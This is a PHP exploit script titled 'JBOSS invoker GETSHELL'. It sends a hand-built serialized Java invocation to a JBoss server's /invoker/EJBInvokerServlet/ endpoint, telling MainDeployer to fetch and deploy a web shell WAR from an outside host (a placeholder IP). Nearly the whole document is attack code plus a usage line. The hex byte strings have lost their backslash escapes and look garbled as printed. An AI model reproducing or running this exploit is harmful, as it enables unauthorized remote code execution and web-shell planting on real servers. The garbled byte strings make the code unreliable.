JBOSS invoker GETSHELL(PHP版)

<?php

$target = @$argv[1]; 
$procotol = @$argv[2];

if ($argc < 2) {
	print "[-]:php Jboss.php https://targets:443 http/https 
";
	exit(1);
}

$url="http://xx.xx.xx.xx/shell.war"; 


$url_len=pack("n",strlen($url));

function hex_dump($data, $newline="
") { 
static $from = '';   
static $to = '';    
static $width = 16; static $pad = '.';  
 if ($from==='')   {     
     for ($i=0; $i<=0xFF; $i++)  { 
         $from .= chr($i);       
         $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;   
     }   
 }    
$hex = str_split(bin2hex($data), $width*2);   
$chars = str_split(strtr($data, $from, $to), $width);    
$offset = 0;   
foreach ($hex as $i => $line)   {     
    echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;    
   $offset += $width;   
  } 
} 

$frag_i=
"xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73". // ....sr.) org.jbos
"x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72". // s.invoca tion.Mar
"x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f". // shalledI nvocatio
"x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77". // n...'A>. ....xppw
"x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76". // .x..G..S .sr..jav
"x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2". // a.lang.I nteger..
"xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75". // .....8.. .I..valu
"x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e". // exr..jav a.lang.N
"x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00". // umber... ........
"x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62". // xp&...sr .$org.jb
"x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d". // oss.invo cation.M
"x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc". // arshalle dValue..
"xe0xd1xf4x4axd0x99x0cx00x00x78x70x77";

$frag_ii="x00";

$frag_iii=
"xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e".     // .....ur. .[Ljava.
"x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f". // lang.Obj ect;..X.
"x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00". // .s)l...x p....sr.
"x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e". // .javax.m anagemen
"x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b". // t.Object Name....
"xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73". // .m.....x pt.!jbos
"x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65". // s.system :service
"x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00". // =MainDep loyerxt.
"x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00". // .deployu q.~.....
"x01x74".
$url_len.
$url.
"x75x72x00".
"x13x5bx4cx6ax61x76x61x2ex6cx61".                         // ur..[ Ljava.la
"x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d". // ng.Strin g;..V...
"x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61". // {G...xp. ...t..ja
"x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67";

$frag_iv=
"x0dxd3". 
"xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67". // ..xw.... .sr."org
"x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f". // .jboss.i nvocatio
"x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8". // n.Invoca tionKey.
"xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64". // .r...... ..I..ord
"x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05". // inalxp.. ..sq.~..
"x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78". // w....... ..p.W..x
"x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04". // w.....sq .~......
"x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e". // sr.#org. jboss.in
"x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74". // vocation .Invocat
"x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02". // ionTypeY .:..+|..
"x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00". // ..I..ord inalxp..
"x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f". // ..sq.~.. ....pt..
"x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73". // JMX_OBJE CT_NAMEs
"x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d". // r..javax .managem
"x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03". // ent.Obje ctName..
"xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62". // ...m.... .xpt.!jb
"x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69". // oss.syst em:servi
"x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78". // ce=MainD eployerx
"x78";                                                             // x

$data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;


function vpost($url,$data){
	$curl = curl_init(); 
	curl_setopt($curl, CURLOPT_URL, $url);
	curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); 
	curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
	curl_setopt($curl, CURLOPT_USERAGENT,'java'); 
	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
	curl_setopt($curl, CURLOPT_AUTOREFERER, 1); 
	curl_setopt($curl, CURLOPT_POST, 1); 
	curl_setopt($curl, CURLOPT_POSTFIELDS, $data); 
	curl_setopt($curl, CURLOPT_TIMEOUT, 30); 
	curl_setopt($curl, CURLOPT_HEADER, 0); 
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
	$tmpInfo = curl_exec($curl);
	if (curl_errno($curl)) {
		echo "Curl https connect Error
";
	}
	curl_close($curl); 
	return "Curl https connect suscess
"; 
}

function tpost($url,$data){
	$curl = curl_init(); 
	curl_setopt($curl, CURLOPT_URL, $url);
	curl_setopt($curl, CURLOPT_USERAGENT,'java'); 
	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
	curl_setopt($curl, CURLOPT_AUTOREFERER, 1); 
	curl_setopt($curl, CURLOPT_POST, 1); 
	curl_setopt($curl, CURLOPT_POSTFIELDS, $data); 
	curl_setopt($curl, CURLOPT_TIMEOUT, 30); 
	curl_setopt($curl, CURLOPT_HEADER, 0); 
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
	$Info = curl_exec($curl);
	if (curl_errno($curl)) {
		echo "Curl http connect Error
";
	}
	curl_close($curl); 
	return "Curl http connect suscess
"; 
}

if($procotol == "https")
{
	echo vpost($target."/invoker/EJBInvokerServlet/", $data);
}else if ($procotol == "http")
{
	echo tpost($target."/invoker/EJBInvokerServlet/", $data);
}else
{
	print "your not enter data
";
	exit(0);
}


?>

　　

Use: php jboss.php https://www.xx.com:443 http/https